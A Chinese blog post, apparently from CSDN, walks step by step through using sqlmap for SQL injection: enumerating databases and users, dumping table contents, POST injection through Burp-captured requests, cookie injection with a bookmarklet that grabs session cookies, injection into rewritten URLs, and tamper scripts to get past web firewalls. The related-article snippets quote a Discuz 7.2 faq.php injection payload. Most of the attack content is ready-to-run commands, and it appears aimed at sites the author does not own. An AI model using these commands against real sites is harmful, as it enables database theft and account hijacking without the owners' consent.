一步一步解读sqlmap是如何操作的

最新推荐文章于 2024-05-14 20:32:45 发布
最新推荐文章于 2024-05-14 20:32:45 发布
阅读量954 收藏 4
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013473481/article/details/18252747
版权

  1. 基础用法:

  ./sqlmap.py -u “注入地址” -v 1 –dbs // 列举数据库

  ./sqlmap.py -u “注入地址” -v 1 –current-db // 当前数据库

  ./sqlmap.py -u “注入地址” -v 1 –users // 列数据库用户

  ./sqlmap.py -u “注入地址” -v 1 –current-user // 当前用户

  ./sqlmap.py -u “注入地址” -v 1 –tables -D “数据库” // 列举数据库的表名

  ./sqlmap.py -u “注入地址” -v 1 –columns -T “表名” -D “数据库” // 获取表的列名

  ./sqlmap.py -u “注入地址” -v 1 –dump -C “字段,字段” -T “表名” -D “数据库” // 获取表中的数据,包含列

  已经开始拖库了,SQLMAP是非常人性化的,它会将获取的数据存储sqlmap/output/中、、、

  2. sqlmap post注入

  我们在使用Sqlmap进行post型注入时,

  经常会出现请求遗漏导致注入失败的情况。

  这里分享一个小技巧,即结合burpsuite来使用sqlmap,

  用这种方法进行post注入测试会更准确,操作起来也非常容易。

  1. 浏览器打开目标地址http:// www,2cto,com /Login.asp

  2. 配置burp代理(127.0.0.1:8080)以拦截请求

  3. 点击login表单的submit按钮

  4. 如下图,这时候Burp会拦截到了我们的登录POST请求

  5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下

  6. 运行sqlmap并使用如下命令:

  ./sqlmap.py -r search-test.txt -p tfUPass

  这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,

  而-p 大家应该比较熟悉,指定注入用的参数。

  3,sqlmap cookies注入

  sqlmap.py -u “http://127.0.0.1/base.php” –cookies “id=1″ –dbs –level 2

  2. 默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我 们直接在原有的基础上面加上 –level 2 即可

  利用sqlmap cookies注入突破用户登录继续注入

  先把用户登陆的cookie拿到吧,

  在收藏夹添加一个链接cookies属性:

  名字自己取

  javascript:alert(document.cookie),,需要获取当前cookie的时候,

  直接点一下这个链接,然后复制一下弹出对话框

  里的cookie值就搞定了

  sqlmap.py -u http://x.x.x.x/Down.aspx?tid=2 -p tid –dbms mssql –cookie=”info=username=test”

  -p是指指定参数注入

  4. sqlmap遇到url重写的注入

  哪里存在注入就加上 * 号

  1

  ./sqlmap.py -u “http://www,cunlide,com/id1/1*/id2/2“

  5.sqlmap 编码绕waf注入

  ./sqlmap.py -u http://127.0.0.1/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

  在sqlmap 的 tamper目录下有很多space2morehash.py 编码脚本自行加载

  其他基础:

  sqlmap -u “http://url/news?id=1” –level=3 –smart –dbms “Mysql” –current-user #获取当前用户名称

  sqlmap -u “http://www.xxoo.com/news?id=1” –level=3 –smart –dbms “Mysql” –current-db #获取当前数据库名称

  sqlmap -u “http://www.xxoo.com/news?id=1” –level=3 –smart –dbms “Mysql”–tables -D “db_name” #列表名

  sqlmap -u “http://url/news?id=1” –level=3 –smart –dbms “Mysql” –columns -T “tablename” users-D “db_name” -v 0 #列字段

  sqlmap -u “http://url/news?id=1” –level=3 –smart –dbms “Mysql” –dump -C “column_name” -T “table_name” -D “db_name” -v 0 #获取字段内容

cdkoa
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlmap操作指南
06-02
sql操纵指南sql操纵指南sql操纵指南sql操纵指南sql操纵指南sql操纵指南sql操纵指南sql操纵指南
打发无聊的100个网站
热门推荐
博客转移到个人主站,请大家移步 http://www.soskp.com/
12-12 22万+
1,打发无聊时光的100个很经典的令人感叹为止网站,看看自己具有哪个大明星的脸型 http://www.play-analogia.com/cgi-bin/index/ <br />2,超有意思的Flash网站,虚拟办公 http://agencynet.com <br />3,亲自动手给美女画纹身 http://www.crustydemons.co.uk/UK/tattoo_parlour/index.html <br />4,输入文字就发出声音! http://www.putonghuaonline.
禁用java跳过本地验证实例
eldn__的专栏
12-01 1万+
来源:习科技术论坛   作者:aijieyu 目标:http://www.xxoo.com.cn ASPX+access的+IIS7.5的站点 那么多大神都搞过,要说存在什么注入和编辑器什么的大神们早就搞了! 虽然这样扫描还是要扫的,但是我扫的是目录 找到后台 http://www.xxoo.com.cn/manage/login.aspx   弱口令什么的都是没有的,
网络安全最全SQLmap使用教程图文教程(超详细),2024年最新太厉害了
最新发布
2401_84264610的博客
05-14 1218
1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
clcl.tv index.php,www.xxoommm.info
weixin_35057804的博客
03-12 1万+
Domain Name: XXOOMMM.INFORegistry Domain ID: D503300000032813918-LRMSRegistrar WHOIS Server: whois.namecheap.comRegistrar URL: www.namecheap.comUpdated Date: 2017-02-06T16:17:55ZCreation Date: 2017-02...
Python 获取动漫番剧 -XXOO
JueDream的博客
01-27 3万+
前言 没有什么好说的,就是想起来前些年失恋使劲刷番剧缓解自己糟糕的情绪。纪念下。 一、直接上代码 1.搜索入口 # 搜索动漫名称 列表 def get_video_list(name): # 开启代理 # proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080' } url = 'http://www.7666.tv/search.php?searchword=' + nam...
100多个经典超酷网站收集
shaily读书学习
05-11 1万+
  1,看看自己具有哪个大明星的脸型 http://www.play-analogia.com/cgi-bin/index/2,超有意思的Flash网站,虚拟办公 http://agencynet.com3,亲自动手给美女画纹身 http://www.crustydemons.co.uk/UK/tattoo_parlour/index.html4,输入文字就发出声音! http://www.put
SQLmap压缩包,SQLmap压缩包
06-07
5. **数据库操作**:执行任意SQL命令,如修改数据、删除记录等。 6. **权限提升**:在某些情况下,SQLmap还可以尝试获取数据库服务器的完全控制权。 7. **隐蔽性**:SQLmap可以通过HTTP代理、Tor网络等方式隐藏攻击...
sqlmap-master
01-04
4. **数据库操作**:不仅仅是读取数据,SQLMap还能执行修改、添加和删除数据库记录的操作,甚至可以控制系统权限,实现数据库的完全控制。 5. **盲注支持**:在目标系统不返回错误信息的情况下,SQLMap能够通过时间...
SQLMAP Windows
02-23
SQLMAP是一款著名的自动化SQL注入工具,专用于检测和利用网站应用程序中的SQL注入漏洞。它可以在Windows操作系统上运行,为安全研究人员和渗透测试人员提供了一种高效且强大的手段来测试目标系统的安全性。 在...
sqlmap基础操作1
08-04
以下将详细介绍SQLMap的基础操作,主要关注三种注入模式:布尔型盲注、时间型盲注和报错注入,并结合提供的命令行参数进行解析。 1. **布尔型盲注**: 这种注入方式是通过页面返回结果的不同来判断SQL语句的真假。...
faq.php 注入,Discuz 7.2 /faq.php SQL注入漏洞
weixin_33582801的博客
04-13 5039
1.获取数据库版本信息 http://www.xxoo.com/faq.php?action=grouppermissiongids[99]=gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema .tables group by x...
hello!everyone
www_xxoopapa_net的博客
08-15 4万+
moongate
sqlmap用法
keepxp的博客
07-28 2万+
Sqlamp Usage https://github.com/sqlmapproject/sqlmap/wiki/Usage Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show ad
正则表达式
xxoo00xx00的博客
12-28 6149
#首先声明正则表达式是和匹配符完全不一样的东西 #这只是grep的进阶 [root@www ~]# grep [-A] [-B] [–color=auto] ‘搜寻字符串’ filename 选项不参数: -A :后面可加数字,为 after 的意思,除了列出该行外,后续的 n 行也列出来; -B :后面可加数字,为 befer 的意思,除了列出该行外,前面的 n 行也列出 来; –c
《干货篇 | Nginx 我还真不信你学不会(中)》
s_alted的博客
06-08 1万+
在《干货篇 | Nginx 我还真不信你学不会(上)》中,我们大概对Nginx有一了一个大概印象:我们知道了Nginx是干什么用的、什么是反向代理和正向代理以及什么是负载均衡。 今天,我们来真正上手操作一下,俗话说“实践是检验真理的唯一标准”嘛,光听理论不上手操作,你永远也学不透。 关于Nginx的内容其实有很多,特别是模块部分的,如果我全部都列出来那5篇文章都写不完,所以我在这里给上Nginx官方文档链接,它里面有详细的教程。作为一名极客,我们要学会当遇到不懂的问题时去翻阅官网文档。 官方文档 下面我将
停在最下面
weixin_34253126的博客
07-17 5789
转载于:https://www.cnblogs.com/sesexxoo/archive/2006/07/17/6190730.html
DNS解析过程
davidlee1214的博客
06-20 3万+
DNS解析过程   当我们从浏览器的地址连中输入一个www.xxoo.com时,DNS解析有大致是个过程,如下: 浏览器先检查自身缓存中有没有解析过的这个域名(www.xxoo.com)对应的ip地址,如果有,解析结束,同时域名被缓存的时间也可通过TTL属性来设置。 如果浏览器缓存中没有(专业术语称为没有命中),浏览器会检查操作系统缓存中有没有对应的已解析过的结果。而操作系...
discuz 7.2 faq.php sql注入漏洞,Discuz 7.2 /faq.php SQL注入漏洞
weixin_31935793的博客
04-07 4279
Discuz 7.2 /faq.php SQL注入漏洞1.获取数据库版本信息http://www.xxoo.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from ...
sqlmap是python
09-17
sqlmap是一个用于自动化SQL注入检测和利用的工具。它在python 2版本下开发,因此在使用python 3的情况下无法直接运行。如果你想使用sqlmap,请安装python 2.6.x或2.7.x版本的python环境。在cmd批处理界面下,进入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值